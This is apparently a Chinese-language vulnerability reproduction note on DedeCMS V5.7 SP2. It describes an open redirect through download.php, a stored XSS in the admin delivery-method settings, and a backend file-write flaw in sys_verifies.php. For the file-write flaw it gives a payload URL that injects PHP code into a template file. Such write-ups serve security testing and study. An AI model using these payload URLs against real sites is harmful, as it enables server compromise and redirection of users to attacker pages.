一、URL重定向
http://127.0.0.1/DedeCMS-V5.7-UTF8-SP2/uploads/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20=
其中aHR0cDovL3d3dy5iYWlkdS5jb20=是http://www.baidu.com的base64编码

访问后发现直接转到百度

二、后台shops_delivery_存储型XSS
管理员在添加用户购买商品的配送方式时，可能会触发存储型xss
模拟管理员添加配送方式：
进入后台—>会员—>配货方式设置—>增加一个配货方式

输入

用户在购买商品时会自动弹出配送方式列表

另外如果网页无法打开可以在后台更新内容

三、sys_verifies后台文件写入
版本：5.7sp1、5.7sp2
漏洞复现
payload
http://127.0.0.1/DedeCMS-V5.7-UTF8-SP2/uploads/dede/sys_verifies.php?action=getfiles&refiles[]=123&refiles[]=%22;phpinfo();die();//
执行后出现以下页面

后台modifytmp.inc被写入了新内容